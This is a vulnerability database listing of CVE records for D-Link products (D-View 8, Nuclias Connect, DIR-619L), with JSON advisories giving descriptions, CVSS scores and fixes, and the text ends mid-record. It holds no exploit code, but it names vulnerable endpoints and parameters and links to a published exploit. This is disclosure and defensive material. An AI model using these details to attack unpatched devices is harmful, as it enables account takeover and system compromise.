Find a vulnerability
Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
828 vulnerabilities by dlink
CVE-2026-23755 (GCVE-0-2026-23755)
Vulnerability from nvd – Published: 2026-01-21 18:02 – Updated: 2026-05-14 02:09- CWE-427 - Uncontrolled Search Path Element
| URL | Tags |
|---|---|
| https://supportannouncement.us.dlink.com/security… | vendor-advisorypatch |
| https://www.vulncheck.com/advisories/dlink-dview-… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-23755",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T15:11:07.575974Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T16:50:59.815Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "D-View 8",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "2.0.1.107",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:*",
"versionEndIncluding": "2.0.1.107",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Kazuma Matsumoto, a security researcher at GMO Cybersecurity by IERAE, Inc."
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an uncontrolled search path vulnerability in the installer. When executed with elevated privileges via UAC, the installer attempts to load version.dll from its execution directory, allowing DLL preloading. An attacker can supply a malicious version.dll alongside the legitimate installer so that, when a victim runs the installer and approves the UAC prompt, attacker-controlled code executes with administrator privileges. This can lead to full system compromise."
}
],
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an uncontrolled search path vulnerability in the installer. When executed with elevated privileges via UAC, the installer attempts to load version.dll from its execution directory, allowing DLL preloading. An attacker can supply a malicious version.dll alongside the legitimate installer so that, when a victim runs the installer and approves the UAC prompt, attacker-controlled code executes with administrator privileges. This can lead to full system compromise."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-427",
"description": "CWE-427 Uncontrolled Search Path Element",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:09:24.354Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"vendor-advisory",
"patch"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-dview-8-installer-dll-preloading-via-uncontrolled-search-path"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later.\u003cbr\u003e"
}
],
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link D-View 8 Installer DLL Preloading via Uncontrolled Search Path",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2026-23755",
"datePublished": "2026-01-21T18:02:30.160Z",
"dateReserved": "2026-01-15T18:42:20.938Z",
"dateUpdated": "2026-05-14T02:09:24.354Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-23754 (GCVE-0-2026-23754)
Vulnerability from nvd – Published: 2026-01-21 18:02 – Updated: 2026-05-14 02:09- CWE-639 - Authorization Bypass Through User-Controlled Key
| URL | Tags |
|---|---|
| https://supportannouncement.us.dlink.com/security… | vendor-advisorypatch |
| https://www.vulncheck.com/advisories/dlink-dview-… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-23754",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T15:11:04.543748Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T16:50:54.833Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "D-View 8",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "2.0.1.107",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:d-view_8:*:*:*:*:*:*:*:*",
"versionEndIncluding": "2.0.1.107",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Kazuma Matsumoto, a security researcher at GMO Cybersecurity by IERAE, Inc."
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system."
}
],
"value": "D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-639",
"description": "CWE-639 Authorization Bypass Through User-Controlled Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:09:23.656Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"vendor-advisory",
"patch"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-dview-8-idor-allows-credential-disclosure-and-account-takeover"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later.\u003cbr\u003e"
}
],
"value": "Upgrade to D-Link D-View 8 version 2.0.5.109 Beta or later."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link D-View 8 IDOR Allows Credential Disclosure and Account Takeover",
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2026-23754",
"datePublished": "2026-01-21T18:02:45.878Z",
"dateReserved": "2026-01-15T18:42:20.938Z",
"dateUpdated": "2026-05-14T02:09:23.656Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34255 (GCVE-0-2025-34255)
Vulnerability from nvd – Published: 2025-10-16 18:52 – Updated: 2026-05-25 23:41- CWE-204 - Observable Response Discrepancy
| URL | Tags |
|---|---|
| https://www.vulncheck.com/advisories/dlink-nuclia… | third-party-advisory |
| https://www.dlink.com/en/for-business/nuclias/nuc… | product |
| https://supportannouncement.us.dlink.com/security… | vendor-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | Nuclias Connect |
Affected:
0 , ≤ 1.3.1.4
(custom)
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34255",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-17T14:29:11.316268Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T14:29:17.095Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"web interface"
],
"product": "Nuclias Connect",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "1.3.1.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.3.1.4",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Alex Williams from Pellera Technologies"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link Nuclias Connect firmware versions \u0026lt;= 1.3.1.4 contain an observable response discrepancy vulnerability.\u0026nbsp;The application\u0027s \u0027Forgot Password\u0027 endpoint returns distinct JSON responses depending on whether the supplied email address is associated with an existing account. Because the responses differ in the `data.exist` boolean value, an unauthenticated remote attacker can enumerate valid email addresses/accounts on the server.\u0026nbsp;NOTE: D-Link states that a fix is under development.\u003cbr\u003e"
}
],
"value": "D-Link Nuclias Connect firmware versions \u003c= 1.3.1.4 contain an observable response discrepancy vulnerability.\u00a0The application\u0027s \u0027Forgot Password\u0027 endpoint returns distinct JSON responses depending on whether the supplied email address is associated with an existing account. Because the responses differ in the `data.exist` boolean value, an unauthenticated remote attacker can enumerate valid email addresses/accounts on the server.\u00a0NOTE: D-Link states that a fix is under development."
}
],
"impacts": [
{
"capecId": "CAPEC-575",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-575 Account Footprinting"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-204",
"description": "CWE-204 Observable Response Discrepancy",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-25T23:41:31.628Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-forgot-password-account-enumeration"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link Nuclias Connect \u003c= v1.3.1.4 Forgot Password Account Enumeration",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34255",
"datePublished": "2025-10-16T18:52:59.964Z",
"dateReserved": "2025-04-15T19:15:22.578Z",
"dateUpdated": "2026-05-25T23:41:31.628Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34254 (GCVE-0-2025-34254)
Vulnerability from nvd – Published: 2025-10-16 18:52 – Updated: 2026-05-25 23:41- CWE-204 - Observable Response Discrepancy
| URL | Tags |
|---|---|
| https://www.vulncheck.com/advisories/dlink-nuclia… | third-party-advisory |
| https://www.dlink.com/en/for-business/nuclias/nuc… | product |
| https://supportannouncement.us.dlink.com/security… | vendor-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | Nuclias Connect |
Affected:
0 , ≤ 1.3.1.4
(custom)
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34254",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-17T14:29:43.264857Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T14:29:49.920Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"web interface"
],
"product": "Nuclias Connect",
"vendor": "D-Link",
"versions": [
{
"lessThanOrEqual": "1.3.1.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.3.1.4",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Alex Williams from Pellera Technologies"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link Nuclias Connect firmware versions \u0026lt;= 1.3.1.4 contain an observable response discrepancy vulnerability.\u0026nbsp;The application\u0027s \u0027Login\u0027 endpoint returns distinct JSON responses depending on whether the supplied username is associated with an existing account. Because the responses differ in the `error.message`string value, an unauthenticated remote attacker can enumerate valid usernames/accounts on the server.\u0026nbsp;NOTE: D-Link states that a fix is under development.\u003cbr\u003e"
}
],
"value": "D-Link Nuclias Connect firmware versions \u003c= 1.3.1.4 contain an observable response discrepancy vulnerability.\u00a0The application\u0027s \u0027Login\u0027 endpoint returns distinct JSON responses depending on whether the supplied username is associated with an existing account. Because the responses differ in the `error.message`string value, an unauthenticated remote attacker can enumerate valid usernames/accounts on the server.\u00a0NOTE: D-Link states that a fix is under development."
}
],
"impacts": [
{
"capecId": "CAPEC-575",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-575 Account Footprinting"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-204",
"description": "CWE-204 Observable Response Discrepancy",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-25T23:41:30.851Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-login-account-enumeration"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link Nuclias Connect \u003c= v1.3.1.4 Login Account Enumeration",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34254",
"datePublished": "2025-10-16T18:52:08.435Z",
"dateReserved": "2025-04-15T19:15:22.578Z",
"dateUpdated": "2026-05-25T23:41:30.851Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34253 (GCVE-0-2025-34253)
Vulnerability from nvd – Published: 2025-10-16 18:53 – Updated: 2026-05-14 02:07- CWE-79 - Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')
| URL | Tags |
|---|---|
| https://www.vulncheck.com/advisories/dlink-nuclia… | third-party-advisory |
| https://www.dlink.com/en/for-business/nuclias/nuc… | product |
| https://supportannouncement.us.dlink.com/security… | vendor-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | Nuclias Connect |
Affected:
0 , < 1.3.1.4
(custom)
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34253",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-17T14:28:34.087394Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T14:28:40.054Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Nuclias Connect",
"vendor": "D-Link",
"versions": [
{
"lessThan": "1.3.1.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.3.1.4",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Alex Williams from Pellera Technologies"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "D-Link Nuclias Connect firmware versions \u0026lt;= 1.3.1.4 contain a stored cross-site scripting (XSS) vulnerability due to improper sanitization of the \u0027Network\u0027 field when editing the configuration, creating a profile, and adding a network. An authenticated attacker can inject arbitrary JavaScript to be executed in the context of other users viewing the profile entry. NOTE: D-Link states that a fix is under development.\u003cbr\u003e"
}
],
"value": "D-Link Nuclias Connect firmware versions \u003c= 1.3.1.4 contain a stored cross-site scripting (XSS) vulnerability due to improper sanitization of the \u0027Network\u0027 field when editing the configuration, creating a profile, and adding a network. An authenticated attacker can inject arbitrary JavaScript to be executed in the context of other users viewing the profile entry. NOTE: D-Link states that a fix is under development."
}
],
"impacts": [
{
"capecId": "CAPEC-592",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-592 Stored XSS"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-14T02:07:58.251Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-stored-xss"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "D-Link Nuclias Connect \u003c= v1.3.1.4 Stored Cross-Site Scripting (XSS)",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34253",
"datePublished": "2025-10-16T18:53:49.731Z",
"dateReserved": "2025-04-15T19:15:22.578Z",
"dateUpdated": "2026-05-14T02:07:58.251Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-9566 (GCVE-0-2024-9566)
Vulnerability from nvd – Published: 2024-10-07 13:00 – Updated: 2024-10-07 13:25 Unsupported When Assigned- CWE-120 - Buffer Overflow
| URL | Tags |
|---|---|
| https://vuldb.com/?id.279460 | vdb-entrytechnical-description |
| https://vuldb.com/?ctiid.279460 | signaturepermissions-required |
| https://vuldb.com/?submit.414541 | third-party-advisory |
| https://github.com/abcdefg-png/IoT-vulnerable/blo… | exploit |
| https://www.dlink.com/ | product |
| Vendor | Product | Version | |
|---|---|---|---|
| D-Link | DIR-619L B1 |
Affected:
2.06
|
|
| d-link | dir-619l_b1 |
Affected:
2.06
cpe:2.3:h:d-link:dir-619l_b1:*:*:*:*:*:*:*:* |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:h:d-link:dir-619l_b1:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "dir-619l_b1",
"vendor": "d-link",
"versions": [
{
"status": "affected",
"version": "2.06"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-9566",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-07T13:22:53.741353Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-07T13:25:20.194Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "DIR-619L B1",
"vendor": "D-Link",
"versions": [
{
"status": "affected",
"version": "2.06"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "yhryhryhr_miemie (VulDB User)"
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability classified as critical was found in D-Link DIR-619L B1 2.06. This vulnerability affects the function formDeviceReboot of the file /goform/formDeviceReboot. The manipulation of the argument next_page leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used."
},
{
"lang": "de",
"value": "In D-Link DIR-619L B1 2.06 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Es geht um die Funktion formDeviceReboot der Datei /goform/formDeviceReboot. Mittels dem Manipulieren des Arguments next_page mit unbekannten Daten kann eine buffer overflow-Schwachstelle ausgenutzt werden. Der Angriff kann \u00fcber das Netzwerk erfolgen. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung."
}
],
"metrics": [
{
"cvssV4_0": {
"baseScore": 8.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0"
}
},
{
"cvssV3_1": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"cvssV3_0": {
"baseScore": 8.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
{
"cvssV2_0": {
"baseScore": 9,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-07T13:00:07.587Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"name": "VDB-279460 | D-Link DIR-619L B1 formDeviceReboot buffer overflow",
"tags": [
"vdb-entry",
"technical-description"
],
"url": "https://vuldb.com/?id.279460"
},
{
"name": "VDB-279460 | CTI Indicators (IOB, IOC, IOA)",
"tags": [
"signature",
"permissions-required"
],
"url": "https://vuldb.com/?ctiid.279460"
},
{
"name": "Submit #414541 | D-Link DIR-619L B1 2.06 Buffer Overflow",
"tags": [
"third-party-advisory"
],
"url": "https://vuldb.com/?submit.414541"
},
{
"tags": [
"exploit"
],
"url": "https://github.com/abcdefg-png/IoT-vulnerable/blob/main/D-Link/DIR-619L/formDeviceReboot.md"
},
{
"tags": [
"product"
],
"url": "https://www.dlink.com/"
}
],
"tags": [
"unsupported-when-assigned"
],
"timeline": [
{
"lang": "en",
"time": "2024-10-07T00:00:00.000Z",
"value": "Advisory disclosed"
},
{
"lang": "en",
"time": "2024-10-07T02:00:00.000Z",
"value": "VulDB entry created"
},
{
"lang": "en",
"time": "2024-10-07T08:25:15.000Z",
"value": "VulDB entry last update"
}
],
"title": "D-Link DIR-619L B1 formDeviceReboot buffer overflow"
}
},
"cveMetadata": {
